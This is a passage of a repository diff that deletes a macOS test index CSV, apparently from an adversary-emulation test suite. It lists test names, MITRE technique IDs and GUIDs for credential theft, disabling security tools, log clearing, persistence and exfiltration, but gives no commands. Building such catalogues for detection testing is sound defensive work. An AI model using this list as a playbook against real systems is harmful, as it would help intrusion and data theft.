187 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
188 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
189 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
190 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
191 command-and-control T1090.001 Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
192 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
193 command-and-control T1132.001 Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
194 command-and-control T1071.001 Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
195 execution T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
196 execution T1609 Container Administration Command 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
197 execution T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
198 execution T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
199 execution T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
200 execution T1053.003 Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
201 execution T1053.003 Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
202 execution T1610 Deploy Container 1 Deploy container using nsenter container escape 58004e22-022c-4c51-b4a8-2b85ac5c596b sh
203 execution T1059.006 Python 1 Execute shell script via python's command mode arguement 3a95cdb2-c6ea-4761-b24e-02b71889b8bb sh
204 execution T1059.006 Python 2 Execute Python via scripts (Linux) 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 sh
205 execution T1059.006 Python 3 Execute Python via Python executables (Linux) 0b44d79b-570a-4b27-a31f-3bf2156e5eaa sh
206 execution T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
207 execution T1059.004 Unix Shell 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
208 execution T1059.004 Unix Shell 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
209 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
210 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
211 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
212 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
213 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
atomics/Indexes/Indexes-CSV/macos-index.csv
-171
View File
@@ -1,171 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1562.001,Disable or Modify Tools,5,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
defense-evasion,T1562.001,Disable or Modify Tools,6,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
defense-evasion,T1562.001,Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
defense-evasion,T1562.001,Disable or Modify Tools,8,Disable macOS Gatekeeper,2a821573-fb3f-4e71-92c3-daac7432f053,sh
defense-evasion,T1562.001,Disable or Modify Tools,9,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1027.002,Software Packing,3,Binary simply packed by UPX,b16ef901-00bb-4dda-b4fc-a04db5067e20,sh
defense-evasion,T1027.002,Software Packing,4,"Binary packed by UPX, with modified headers",4d46e16b-5765-4046-9f25-a600d3e65e4d,sh
defense-evasion,T1036.006,Space after Filename,1,Space After Filename,89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1070.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Diectory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1087.001,Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
discovery,T1069.001,Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1569.001,Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
execution,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 credential-access T1552.003 Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
3 credential-access T1110.004 Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
4 credential-access T1552.001 Credentials In Files 1 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
5 credential-access T1552.001 Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
6 credential-access T1552.001 Credentials In Files 5 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
7 credential-access T1555.003 Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
8 credential-access T1056.002 GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
9 credential-access T1555.001 Keychain 1 Keychain 1864fdec-ff86-4452-8c30-f12507582a93 sh
10 credential-access T1040 Network Sniffing 2 Packet Capture macOS 9d04efee-eff5-4240-b8d2-07792b873608 bash
11 credential-access T1552.004 Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
12 credential-access T1552.004 Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
13 collection T1560.001 Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
14 collection T1560.001 Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
15 collection T1560.001 Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
16 collection T1560.001 Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
17 collection T1115 Clipboard Data 3 Execute commands from clipboard 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff bash
18 collection T1056.002 GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
19 collection T1074.001 Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
20 collection T1113 Screen Capture 1 Screencapture 0f47ceb1-720f-4275-96b8-21f0562217ac bash
21 collection T1113 Screen Capture 2 Screencapture (silent) deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 bash
22 privilege-escalation T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
23 privilege-escalation T1053.003 Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
24 privilege-escalation T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
25 privilege-escalation T1543.001 Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
26 privilege-escalation T1543.004 Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
27 privilege-escalation T1053.004 Launchd 1 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
28 privilege-escalation T1037.002 Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
29 privilege-escalation T1547.011 Plist Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
30 privilege-escalation T1037.004 RC Scripts 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
31 privilege-escalation T1547.007 Re-opened Applications 1 Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba manual
32 privilege-escalation T1547.007 Re-opened Applications 2 Re-Opened Applications 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
